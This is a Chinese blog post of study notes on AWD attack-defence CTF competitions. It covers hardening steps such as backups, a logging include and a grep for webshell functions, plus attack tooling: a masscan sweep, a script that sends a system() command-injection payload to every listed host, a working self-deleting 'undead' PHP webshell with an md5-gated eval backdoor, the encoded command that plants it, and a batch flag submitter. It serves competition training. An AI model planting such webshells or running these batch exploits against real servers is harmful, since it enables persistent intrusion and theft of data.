AWD简单思路与学习笔记
作者:互联网
第一次参加线下AWD比赛,思路太窄,手忙脚乱,通过其他大佬开源的AWD平台以及比赛的PHP环境整理一下简单的思路。
GitHub AWD平台地址:https://github.com/m0xiaoxi/AWD_CTF_Platform
加固思路:
1、登录服务器SSH 修改密码:passwd 2、下载源码并备份(FileZilla—Sftp—询问密码方式) tar -czvf /tmp/html.tar.gz /var/www/html(压缩) cd /tmp tar -xzvf /tmp/html.tar.gz(解压) cp -R /tmp/var/www/html/. /var/www/html/ (复制) mysql dump -u root -p test(数据库名) > test.sql(备份数据库) mysql -u root -p test(数据库名) < test.sql (还原数据库) 3、快速查找命令:- 上WAF或日志记录(若waf在web目录下需要删除掉waf文件的include)
find /var/www/html -name "*.php"|xargs sed -i "s#<?php#<?php\ninclude('/var/www/html/php_log.php');\n#g"
- 快速查一下shell
find /var/www/html -name "*.php" |xargs egrep 'assert|eval|phpinfo\(\)|\(base64_decoolcode|shell_exec|passthru|file_put_contents\(\.\*\$|base64_decode\('
3、Webshell查杀(D盾):删除木马后门。
4、代码审计(seay):存在漏洞的变量直接写死等。
5、抓流量:tcpdump tcp -t -s 0 and port 80 -w /tmp/target.cap
-t : 不显示时间戳
-s 0 : 抓取数据包时默认抓取长度为68字节。加上-S 0 后可以抓到完整的数据包
攻击思路:
1、扫描攻击目标:sudo masscan --range 192.168.100.1-192.168.100.100 -Pn -p5000 -oX scan.xml 2、解析scan.xml到IP.txt
1 import re
2
3 ipaddr_re = "((25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}(25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)"
4 ip_re = "addr=.*addrtype="
5 port_re = "portid=.*><state"
6 portnum_re = "[1-9]\d*"
7
8 def readxml(path):
9 with open(path, "r") as f:
10 list = []
11 for line in f.readlines():
12 line = line.strip('\n') #去掉列表中每一个元素的换行符
13 if "addr=" in line:
14 ip = re.search(ip_re, line).group()
15 ip = re.search(ipaddr_re, ip).group()
16 port = re.search(port_re, line).group()
17 port = re.search(portnum_re, port).group()
18 list.append([ip, port])
19 return list
20
21 def writetxt(list):
22 with open("ip.txt", "w") as f:
23 for i in list:
24 ip_port = i[0] + ":" + i[1] +"\n"
25 f.write(ip_port)
26
27 def main():
28 list = readxml("scan.xml")
29 writetxt(list)
30
31 if __name__ == '__main__':
32 main()
View Code
3、burp抓取payload后批量攻击:
Burp插件copy as python-requests Burp报文转换为Python requests库格式: 输出示例:1 import requests
2
3 burp0_url = "http://192.168.0.103:8801/config.php?a=system(%22ls%22);"
4 burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
5 burp0_headers = {"Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
6 requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
1 import requests
2 import re
3 import time
4
5 def IP(IP_path):
6 IP_list = []
7 with open(IP_path, "r") as f:
8 for line in f.readlines():
9 line = line.strip('\n') #去掉列表中每一个元素的换行符
10 IP_list.append(line)
11 return IP_list
12
13 def attack(IP_list):
14 result_list = []
15
16 '''下面参数需要根据实际情况进行替换'''
17 burp0_url = "http://192.168.0.103:8801/images/.config.php?passwd=FPXtian"
18 burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
19 burp0_headers = {"Upgrade-Insecure-Requests": "1",
20 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
21 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
22 "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
23 burp0_data = {"cmd": "system(\"cat ../../../../flag\");"}
24
25 url = burp0_url.split("/")
26 for ip in IP_list:
27 url[2] = ip
28 burp0_url = "/".join(url)
29 print(burp0_url)
30 try:
31 '''下面语句需要根据实际情况进行替换,建议加上timeout'''
32 r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=5)
33
34 if r.status_code == 200:
35 result_list.append(ip + "\n")
36 result_list.append(r.text + "\n")
37 print(r.text)
38 except requests.exceptions.Timeout:
39 continue
40 return result_list
41
42 def write(result_list):
43 with open("result.txt", "w") as f:
44 for line in result_list:
45 f.write(line)
46
47 def main():
48 IP_list = IP("IP.txt")
49 result_list = attack(IP_list)
50 write(result_list)
51
52 if __name__ == '__main__':
53 main()
View Code
4、通过默认后门批量种不死马:命令执行写入不死马: GET方式需要转换为url编码:
cmd=system('while%20true%3Bdo%20echo%20%5C'%3C%3Fphp%20if(md5(%24_GET%5Bpasswd%5D)%3D%3D%22139bdb983ee92a3624f2cc978f0cb3b7%22)%7B%40eval(%24_REQUEST%5Bcmd%5D)%3B%7D%20%3F%3E%5C'%20%3E.config.php%3Bsleep%200.1%3Bdone%3B')%3B
明文:
system('while true;do echo \'<?php if(md5($_GET[passwd])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>\' >.config.php;sleep 0.1;done;');
5、通过上传漏洞批量种不死马:
不死马.php:
1 <?php
2 ignore_user_abort(true);
3 set_time_limit(0);
4 unlink(__FILE__);
5 $file = '.config.php';
6 $code = '<?php if(md5($_GET["passwd"])=="139bdb983ee92a3624f2cc978f0cb3b7"){@eval($_REQUEST[cmd]);} ?>';
7 while (1){
8 file_put_contents($file,$code);
9 usleep(5000);
10 }
11 ?>
12
13 //.config.php?passwd=FPXtian&cmd=system("ls");
6、通过不死马批量获取flag:
构造获取flag payload,使用插件copy as python-requests生成requests库的参数,替换至批量访问脚本中批量访问
7、批量提交flag:
1 import requests
2 import re
3 import time
4
5 # flag_re = "flag(.*)"
6 flag_re = ".{32}"
7
8 def flag(flag_path):
9 flag_list = []
10 with open(flag_path, "r") as f:
11 for line in f.readlines():
12 line = line.strip('\n') #去掉列表中每一个元素的换行符
13 if re.search(flag_re, line):
14 flag = re.search(flag_re, line).group()
15 flag_list.append(flag)
16 return flag_list
17
18 def submit(flag_list):
19 for flag in flag_list:
20
21 '''下面参数需要根据实际情况进行替换'''
22 burp0_url = "http://192.168.0.103:9090"
23 burp0_cookies = {"PHPSESSID": "emgs98ub1lrujtv4ai9gous346"}
24 burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1",
25 "Origin": "http://192.168.0.103:9090", "Content-Type": "application/x-www-form-urlencoded",
26 "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",
27 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
28 "Referer": "http://192.168.0.103:9090/?flag=1", "Accept-Encoding": "gzip, deflate",
29 "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
30 burp0_data = {"flag": flag, "token": "4300f7f61934925694f6138f3045e61e"}
31
32 try:
33 '''下面语句需要根据实际情况进行替换,建议加上timeout'''
34 r = requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data, timeout=5)
35 if r.status_code == 200:
36 print(flag, r.text)
37 except requests.exceptions.Timeout:
38 continue
39
40 def main():
41 flag_list = flag("result.txt")
42 submit(flag_list)
43
44 if __name__ == '__main__':
45 main()
View Code
后续防御与攻击思路:
1、分析流量:修复漏洞,或者直接通过其他队伍的攻击流量进行批量反打。 2、杀不死马:1 while true 2 do 3 rm -f .config.php 4 done
标签:burp0,url,IP,list,笔记,re,flag,思路,AWD 来源: https://www.cnblogs.com/Vinson404/p/13779839.html